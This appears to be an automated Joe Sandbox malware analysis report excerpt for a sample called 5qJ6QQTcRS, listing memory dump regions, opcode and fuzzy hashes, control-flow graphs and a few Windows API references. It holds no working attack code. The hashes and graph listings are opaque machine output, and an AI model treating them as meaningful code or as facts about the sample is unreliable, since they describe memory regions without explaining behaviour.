                                                                                                              • Source File: 00000000.00000002.1973858910.0000000007F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7f50000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fb95ab77bcce4a19dbaf59617112a75673736d26aca0dc3573a956644052da71
                                                                                                              • Instruction ID: 2c7c0c54e571e9add01e2ab758c1b1b68eb756075f85ed017e4a730b0aeb37c9
                                                                                                              • Opcode Fuzzy Hash: fb95ab77bcce4a19dbaf59617112a75673736d26aca0dc3573a956644052da71
                                                                                                              • Instruction Fuzzy Hash: 23525E74A003458FDB14DF28C844B99B7B2FF89314F2582A9D5586F3A1DBB1AD86CF81
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973533465.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7690000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7d151192af371c4da0af26d0982b09145bb9498ffce53c5169312d707b0337ce
                                                                                                              • Instruction ID: 183bd879d0f5cc1d066d2c9943474b1cb7a3c0db97ab30cd85fa17b0698865a2
                                                                                                              • Opcode Fuzzy Hash: 7d151192af371c4da0af26d0982b09145bb9498ffce53c5169312d707b0337ce
                                                                                                              • Instruction Fuzzy Hash: A032C17091D3948FC712AB78CCA43597FB5BF86300F4545EAC489E7292CA385E89CF55
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973858910.0000000007F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7f50000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8c07350906677a4cf412e47bf2dd7129c4d85096847a3066eac776d4e91205dc
                                                                                                              • Instruction ID: 8e48d2d8a55074aace24e59ee114bdd9a74efd758ae121fb0f2d7b8df98ab83b
                                                                                                              • Opcode Fuzzy Hash: 8c07350906677a4cf412e47bf2dd7129c4d85096847a3066eac776d4e91205dc
                                                                                                              • Instruction Fuzzy Hash: EE526E74A003458FDB14DF24C844B99B7B2FF89314F2582A9D5586F3A2DBB1AD86CF81
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973711422.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7910000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dc17d0a5036a7c46f12bff9606fd6b6f309f199ece8bfaff8dc258f6d9c197c2
                                                                                                              • Instruction ID: 8946408422c9a9bb05817047c3184576ba9a616ec48403c6ca32946effe85950
                                                                                                              • Opcode Fuzzy Hash: dc17d0a5036a7c46f12bff9606fd6b6f309f199ece8bfaff8dc258f6d9c197c2
                                                                                                              • Instruction Fuzzy Hash: CEF139B4A1566A8FDB64CF65C944B9DFBB6BF88340F10C5EAD40EAB214D7749A81CF00
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973711422.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7910000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5f39f8471fd61648532e2d107f8c3f49c43f2c82f1e04a29702820c72af3f307
                                                                                                              • Instruction ID: f53a41cacaa06ffe3f62ad2420ea29955a32a5ce419b4bf6333155f25367b9d2
                                                                                                              • Opcode Fuzzy Hash: 5f39f8471fd61648532e2d107f8c3f49c43f2c82f1e04a29702820c72af3f307
                                                                                                              • Instruction Fuzzy Hash: ABB144B0E55219CBDF04CFA9D9456DDFBB2BB8A304F10992AD40ABB254D7389811CF24
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1972501213.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6120000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ad507e8ae9659c85d79c98f0b9df4479cd1c5231d715308a5d801da78ea3ba72
                                                                                                              • Instruction ID: 7df610055b3d6ec181bd5afcf43a067a6ee4bf7bf89b7c8ccc024693f1b3974f
                                                                                                              • Opcode Fuzzy Hash: ad507e8ae9659c85d79c98f0b9df4479cd1c5231d715308a5d801da78ea3ba72
                                                                                                              • Instruction Fuzzy Hash: 34A1C235E0031A9FDB05DFA4D8949EDBBBAFF89310F158215E516AB2A0DB30ED91CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973533465.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7690000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7c4a41bcc44a80136fa3c38ba37cdf92c29d9cf504fa0b37a55ff67c4e6f36c1
                                                                                                              • Instruction ID: d33ac76b6486898903257747b71bef66ca4e621803d69b26933220fb75d22278
                                                                                                              • Opcode Fuzzy Hash: 7c4a41bcc44a80136fa3c38ba37cdf92c29d9cf504fa0b37a55ff67c4e6f36c1
                                                                                                              • Instruction Fuzzy Hash: 6091D2B5E042098FDB04CFAAC884ADEFBB6FF89300F24902AD416BB255D7359946CF54
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1964375284.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e20000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 500c62f349764982dad61d4d69c13572edffc613c1c56de42bc61a8cf1f80bf9
                                                                                                              • Instruction ID: 660ff1ec0e1ca942d324c40973c7654e0d10a72c38cb855908b978e27d352121
                                                                                                              • Opcode Fuzzy Hash: 500c62f349764982dad61d4d69c13572edffc613c1c56de42bc61a8cf1f80bf9
                                                                                                              • Instruction Fuzzy Hash: C571B430B002249FE714AB65DC157BEBAA3BB84700F35856AF55ABB3D2CE758C418BC5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1972501213.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6120000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f9384a254964cc29b2386ef518dedc468c7aed26a1c77d809bb198d8533640d3
                                                                                                              • Instruction ID: 1124ccf412af10a58b0a239958c2e46c32d51850329d9b9d70730e5138f226fe
                                                                                                              • Opcode Fuzzy Hash: f9384a254964cc29b2386ef518dedc468c7aed26a1c77d809bb198d8533640d3
                                                                                                              • Instruction Fuzzy Hash: 8F91A239E003199FCB05DFA4D8849EDBBBAFF99310F158215E516AB2A4DB30ED91CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973533465.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7690000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 52339995eace442e946c34819dd777f14c56f7a5c42dac331a5068470b7ddc64
                                                                                                              • Instruction ID: 96fa4057742a90aa68449680477d1f6c5e7daee814a96cda0909ee3bdba54d83
                                                                                                              • Opcode Fuzzy Hash: 52339995eace442e946c34819dd777f14c56f7a5c42dac331a5068470b7ddc64
                                                                                                              • Instruction Fuzzy Hash: 7991D3B5E002098FDB44CFAAC884ADEFBB6FF89300F24902AD416BB354D73599468F54
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1972501213.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6120000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 975986107d3be2b0035b92112f08dc2422396378e07bc4fea46dedc335ca4780
                                                                                                              • Instruction ID: e7e28d3bf666d5d00fc4f10e0da1c05d1536c6d6013499471ddc99f31652311a
                                                                                                              • Opcode Fuzzy Hash: 975986107d3be2b0035b92112f08dc2422396378e07bc4fea46dedc335ca4780
                                                                                                              • Instruction Fuzzy Hash: 6E819439E0031A9FCB05DFA4D8849EDBBBAFF99310F158215E515AB2A4DB30ED91CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973711422.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7910000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 688c3f555a739fa6ff040a6594fa6f0ea806b0ec7c979892eea9a18e2aad205b
                                                                                                              • Instruction ID: e2d31f274d1a70cbf0c71968d8a90fd4c113043efba0d23bab43cc3e91413307
                                                                                                              • Opcode Fuzzy Hash: 688c3f555a739fa6ff040a6594fa6f0ea806b0ec7c979892eea9a18e2aad205b
                                                                                                              • Instruction Fuzzy Hash: 8B613474A1520DEFCB04CFA9C5849EEFBF2FB89220F1895AAD515A7320D7309A50CF60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973711422.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7910000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 90c9c55f16bb6065f9ded0ab90ec8808a2e98fb52279961ca1c0f70a45cc8b69
                                                                                                              • Instruction ID: bb329b6aa29ed253028c1c4aca99eb65dc4e113fb183ced126a26b413cbcc679
                                                                                                              • Opcode Fuzzy Hash: 90c9c55f16bb6065f9ded0ab90ec8808a2e98fb52279961ca1c0f70a45cc8b69
                                                                                                              • Instruction Fuzzy Hash: 626145F0E1020DDFCB04CFA9D9556AEBBB2FF89305F20882AD412AB250DB755A11DF91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973711422.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7910000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f5ef5dc7527f02276f1f5fb9c300036687abf8cabb93ab2eb777a3bbad487acd
                                                                                                              • Instruction ID: 9bd7f9dea95e1be6e9efed8c486667def73c1737b9753c7f748fe9d072027059
                                                                                                              • Opcode Fuzzy Hash: f5ef5dc7527f02276f1f5fb9c300036687abf8cabb93ab2eb777a3bbad487acd
                                                                                                              • Instruction Fuzzy Hash: EC511AB0D01218CFDB14CFAAC984ADDBBF6FF89314F1084A9D409AB254DB366A95CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973711422.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7910000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dce6b2bc4f0fe67c4c73578639bedc8fb606d7c500faffa95988d351abd3c35d
                                                                                                              • Instruction ID: cc9ed4d6a30507634283160d98e972270735a71b9f26c35df4dc2ac2c3d46169
                                                                                                              • Opcode Fuzzy Hash: dce6b2bc4f0fe67c4c73578639bedc8fb606d7c500faffa95988d351abd3c35d
                                                                                                              • Instruction Fuzzy Hash: FE516CB0D052588FDB15CFAAC8806DEFBF2BF89300F14C4AAD409AB254DB355A95CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973533465.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7690000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e2412492132c7ce509a2f970cf22a70eb87752efa29562bd7d4c5b6a78383f51
                                                                                                              • Instruction ID: 1084718a6e850703b6dd9baf861da5d48057950435f2f05f9c8c81ebf384c07e
                                                                                                              • Opcode Fuzzy Hash: e2412492132c7ce509a2f970cf22a70eb87752efa29562bd7d4c5b6a78383f51
                                                                                                              • Instruction Fuzzy Hash: 8B31FBB1E046598FEB58CF6ADC41B9EBBB7AFC9200F14C1BAD408A7255DB305A45CF21
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973711422.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7910000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9e2d620b87fec5c53d9c409dd5935a80c8114b394e4f6fb95efd7ade6e9b9eaa
                                                                                                              • Instruction ID: 6bedbd3d0ee840c1da43c3eb112ed5a8bbff034b6080c1296aaec7c718e15b86
                                                                                                              • Opcode Fuzzy Hash: 9e2d620b87fec5c53d9c409dd5935a80c8114b394e4f6fb95efd7ade6e9b9eaa
                                                                                                              • Instruction Fuzzy Hash: 9B21ECB1E116189BEB58CF6BD84069EF7F7AFC8200F04C5BAC508A6264EB3416558F51

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 e25470-e2548d 1 e2548f-e25492 0->1 2 e25494 1->2 3 e2549b-e254c4 1->3 2->3 4 e255a2-e255a7 2->4 5 e25662-e2568c 2->5 6 e254c6-e254c8 2->6 7 e25705-e2570a 2->7 8 e254cb-e254d3 2->8 9 e254ee-e254fb 2->9 10 e2564e-e25652 2->10 11 e2568e-e25692 2->11 12 e2570f-e25726 2->12 13 e255ac-e255d5 2->13 14 e257b2-e257c6 2->14 15 e256d3-e256d7 2->15 16 e254d5-e254dd 2->16 17 e255f5-e25608 2->17 18 e25775 2->18 19 e2561b-e2561f 2->19 20 e2579b-e257b0 2->20 21 e25539-e2555a 2->21 22 e25739-e2573d 2->22 3->6 25 e254e2-e254e5 4->25 29 e2560f-e25612 5->29 6->8 7->29 8->1 66 e2551c 9->66 67 e254fd-e25506 9->67 35 e25654 10->35 36 e2565b-e25660 10->36 23 e256b3 11->23 24 e25694-e2569d 11->24 68 e25732-e25737 12->68 69 e25728 12->69 93 e255dd-e255f3 13->93 27 e256fa 15->27 28 e256d9-e256e2 15->28 16->25 30 e2560a 17->30 38 e2577d-e25780 18->38 31 e25640 19->31 32 e25621-e2562a 19->32 20->38 85 e25560-e25564 21->85 33 e25760 22->33 34 e2573f-e25748 22->34 39 e256b6-e256c0 23->39 41 e256a4-e256a7 24->41 42 e2569f-e256a2 24->42 25->9 48 e254e7 25->48 45 e256fd-e256ff 27->45 46 e256e4-e256e7 28->46 47 e256e9-e256f6 28->47 29->19 51 e25614 29->51 30->29 50 e25643-e2564b 31->50 54 e25631-e25634 32->54 55 e2562c-e2562f 32->55 58 e25763-e25770 33->58 56 e2574a-e2574d 34->56 57 e2574f-e2575c 34->57 53 e25659 35->53 36->5 36->53 38->20 60 e25782 38->60 62 e256c2 39->62 63 e256cc-e256d1 39->63 61 e256b1 41->61 42->61 45->7 64 e256f8 46->64 47->64 48->4 48->5 48->7 48->9 48->10 48->11 48->12 48->13 48->14 48->15 48->17 48->18 48->19 48->20 48->21 48->22 50->10 51->5 51->7 51->10 51->11 51->12 51->14 51->15 51->18 51->19 51->20 51->22 53->29 65 e2563e 54->65 55->65 70 e2575e 56->70 57->70 58->29 60->14 60->20 61->39 72 e256c7 62->72 63->15 63->72 64->45 65->50 75 e2551f-e25529 66->75 77 e25508-e2550b 67->77 78 e2550d-e25510 67->78 68->22 76 e2572d 68->76 69->76 70->58 72->29 83 e25532-e25537 75->83 84 e2552b 75->84 76->29 82 e2551a 77->82 78->82 82->75 83->21 88 e25530 83->88 84->88 89 e25566-e2556f 85->89 90 e25587 85->90 88->25 91 e25571-e25574 89->91 92 e25576-e25583 89->92 94 e2558a-e2559c 90->94 95 e25585 91->95 92->95 93->30 94->4 95->94
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1964375284.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e20000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Yq$Zq$Zq$Zq$Zq$Zq$Zq$Zq$Zq$Zq
                                                                                                              • API String ID: 0-3337616164
                                                                                                              • Opcode ID: 548b6857d75972c2745d7d370e5be62455d7481855d70406f0e1ffdd26f5fe60
                                                                                                              • Instruction ID: d66c021e3c1eff4e8ab18e5343a46dfabdfdf057cbea669e9be07e147e086d35
                                                                                                              • Opcode Fuzzy Hash: 548b6857d75972c2745d7d370e5be62455d7481855d70406f0e1ffdd26f5fe60
                                                                                                              • Instruction Fuzzy Hash: B0A14C31B10A28DFDB04DB99EA54BADB7B2BF88311F645466E402BB390DB74DC81CB51

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 370 e25461-e2548d 373 e2548f-e25492 370->373 374 e25494 373->374 375 e2549b-e254c4 373->375 374->375 376 e255a2-e255a7 374->376 377 e25662-e2568c 374->377 378 e254c6-e254c8 374->378 379 e25705-e2570a 374->379 380 e254cb-e254d3 374->380 381 e254ee-e254fb 374->381 382 e2564e-e25652 374->382 383 e2568e-e25692 374->383 384 e2570f-e25726 374->384 385 e255ac-e255d5 374->385 386 e257b2-e257c6 374->386 387 e256d3-e256d7 374->387 388 e254d5-e254dd 374->388 389 e255f5-e25608 374->389 390 e25775 374->390 391 e2561b-e2561f 374->391 392 e2579b-e257b0 374->392 393 e25539-e2555a 374->393 394 e25739-e2573d 374->394 375->378 397 e254e2-e254e5 376->397 401 e2560f-e25612 377->401 378->380 379->401 380->373 438 e2551c 381->438 439 e254fd-e25506 381->439 407 e25654 382->407 408 e2565b-e25660 382->408 395 e256b3 383->395 396 e25694-e2569d 383->396 440 e25732-e25737 384->440 441 e25728 384->441 465 e255dd-e255f3 385->465 399 e256fa 387->399 400 e256d9-e256e2 387->400 388->397 402 e2560a 389->402 410 e2577d-e25780 390->410 403 e25640 391->403 404 e25621-e2562a 391->404 392->410 457 e25560-e25564 393->457 405 e25760 394->405 406 e2573f-e25748 394->406 411 e256b6-e256c0 395->411 413 e256a4-e256a7 396->413 414 e2569f-e256a2 396->414 397->381 420 e254e7 397->420 417 e256fd-e256ff 399->417 418 e256e4-e256e7 400->418 419 e256e9-e256f6 400->419 401->391 423 e25614 401->423 402->401 422 e25643-e2564b 403->422 426 e25631-e25634 404->426 427 e2562c-e2562f 404->427 430 e25763-e25770 405->430 428 e2574a-e2574d 406->428 429 e2574f-e2575c 406->429 425 e25659 407->425 408->377 408->425 410->392 432 e25782 410->432 434 e256c2 411->434 435 e256cc-e256d1 411->435 433 e256b1 413->433 414->433 417->379 436 e256f8 418->436 419->436 420->376 420->377 420->379 420->381 420->382 420->383 420->384 420->385 420->386 420->387 420->389 420->390 420->391 420->392 420->393 420->394 422->382 423->377 423->379 423->382 423->383 423->384 423->386 423->387 423->390 423->391 423->392 423->394 425->401 437 e2563e 426->437 427->437 442 e2575e 428->442 429->442 430->401 432->386 432->392 433->411 444 e256c7 434->444 435->387 435->444 436->417 437->422 447 e2551f-e25529 438->447 449 e25508-e2550b 439->449 450 e2550d-e25510 439->450 440->394 448 e2572d 440->448 441->448 442->430 444->401 455 e25532-e25537 447->455 456 e2552b 447->456 448->401 454 e2551a 449->454 450->454 454->447 455->393 460 e25530 455->460 456->460 461 e25566-e2556f 457->461 462 e25587 457->462 460->397 463 e25571-e25574 461->463 464 e25576-e25583 461->464 466 e2558a-e2559c 462->466 467 e25585 463->467 464->467 465->402 466->376 467->466
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1964375284.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e20000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Yq$Zq$Zq$Zq$Zq$Zq$Zq
                                                                                                              • API String ID: 0-3716531607
                                                                                                              • Opcode ID: f1566951ad4b9fd2cca44df0d724c4bf37c69f2e17d31a6d7d2158ac8eab2539
                                                                                                              • Instruction ID: d76d93d969c214b05bf5d80db25effae70a2c6cc866dfb0e54da55b0448152d1
                                                                                                              • Opcode Fuzzy Hash: f1566951ad4b9fd2cca44df0d724c4bf37c69f2e17d31a6d7d2158ac8eab2539
                                                                                                              • Instruction Fuzzy Hash: 1C819E32A04A24DFDB14DF69EA547ADB7B2BF44311F645066E402BB3A0DB74DC81CB51

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 470 4feca30-4fecacf GetCurrentProcess 474 4fecad8-4fecb0c GetCurrentThread 470->474 475 4fecad1-4fecad7 470->475 476 4fecb0e-4fecb14 474->476 477 4fecb15-4fecb49 GetCurrentProcess 474->477 475->474 476->477 478 4fecb4b-4fecb51 477->478 479 4fecb52-4fecb6d call 4fed028 477->479 478->479 483 4fecb73-4fecba2 GetCurrentThreadId 479->483 484 4fecbab-4fecc0d 483->484 485 4fecba4-4fecbaa 483->485 485->484
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 04FECABE
                                                                                                              • GetCurrentThread.KERNEL32 ref: 04FECAFB
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 04FECB38
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 04FECB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1971403525.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4fe0000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Current$ProcessThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2063062207-0
                                                                                                              • Opcode ID: b9c54e43b525c29b63a77e5342e04789b84b390601608460c5ecc3d67bdc5f9f
                                                                                                              • Instruction ID: ab6b84df02ad07b4d88c8e2afc7cd7434f208ed86096cd7c678e6342dbd8647d
                                                                                                              • Opcode Fuzzy Hash: b9c54e43b525c29b63a77e5342e04789b84b390601608460c5ecc3d67bdc5f9f
                                                                                                              • Instruction Fuzzy Hash: 97515CB0D003498FEB14CFAAD548BEEBBF1EF88314F208459E419A7350D774A946CB66

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 492 4feca40-4fecacf GetCurrentProcess 496 4fecad8-4fecb0c GetCurrentThread 492->496 497 4fecad1-4fecad7 492->497 498 4fecb0e-4fecb14 496->498 499 4fecb15-4fecb49 GetCurrentProcess 496->499 497->496 498->499 500 4fecb4b-4fecb51 499->500 501 4fecb52-4fecb6d call 4fed028 499->501 500->501 505 4fecb73-4fecba2 GetCurrentThreadId 501->505 506 4fecbab-4fecc0d 505->506 507 4fecba4-4fecbaa 505->507 507->506
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 04FECABE
                                                                                                              • GetCurrentThread.KERNEL32 ref: 04FECAFB
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 04FECB38
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 04FECB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1971403525.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4fe0000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Current$ProcessThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2063062207-0
                                                                                                              • Opcode ID: 86bd177d0ef6afb728b3ef4f9d931250591d8a7f759c7ed7e19e20234674fb2e
                                                                                                              • Instruction ID: 484bd974083af90fe839cb08c5dd2d53d684439c7d53cd9804370c3601f56b96
                                                                                                              • Opcode Fuzzy Hash: 86bd177d0ef6afb728b3ef4f9d931250591d8a7f759c7ed7e19e20234674fb2e
                                                                                                              • Instruction Fuzzy Hash: B35149B0D007498FEB14CFAAD548BAEBBF1EF88314F208459E419A7350D778A945CF66

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 4194 7630328-7632b65 4197 7632b6b-7632b6d 4194->4197 4198 7632cb9-7632cde 4194->4198 4199 7632b73-7632b7c 4197->4199 4200 7632ce5-7632d28 4197->4200 4198->4200 4202 7632b8f-7632bb6 4199->4202 4203 7632b7e-7632b8c 4199->4203 4232 7632d29-7632d4b 4200->4232 4204 7632c3f-7632c43 4202->4204 4205 7632bbc-7632bce call 76301a4 call 7632480 4202->4205 4203->4202 4207 7632c45-7632c72 call 7630408 4204->4207 4208 7632c7a-7632c93 4204->4208 4205->4204 4223 7632bd0-7632c23 4205->4223 4226 7632c77 4207->4226 4218 7632c95 4208->4218 4219 7632c9d 4208->4219 4218->4219 4219->4198 4223->4204 4229 7632c25-7632c38 4223->4229 4226->4208 4229->4204 4233 7632d57-7632d9c 4232->4233 4234 7632d4d-7632d56 4232->4234 4233->4232 4240 7632d9e-7632e2c 4233->4240 4243 7632e32-7632e40 4240->4243 4244 7632e42-7632e48 4243->4244 4245 7632e49-7632e81 4243->4245 4244->4245 4249 7632e83-7632e87 4245->4249 4250 7632e91 4245->4250 4249->4250 4251 7632e89 4249->4251 4252 7632e92 4250->4252 4251->4250 4252->4252
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973434926.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7630000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (q$(q$(q
                                                                                                              • API String ID: 0-2103260149
                                                                                                              • Opcode ID: 601da95df002f6ca36c5dd93c0658d04773a5fb1b7b211a4dd6ae58448d8fee8
                                                                                                              • Instruction ID: f327f1e90d90c63db00c495a332601649dd6be25522d44a71b0880242c908823
                                                                                                              • Opcode Fuzzy Hash: 601da95df002f6ca36c5dd93c0658d04773a5fb1b7b211a4dd6ae58448d8fee8
                                                                                                              • Instruction Fuzzy Hash: 58A19DB0A003099FDB14DFA9C85479EBBF1FF89310F248569E40AAB351DB74A985CB91
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1964375284.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e20000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ,q$,q
                                                                                                              • API String ID: 0-1667412543
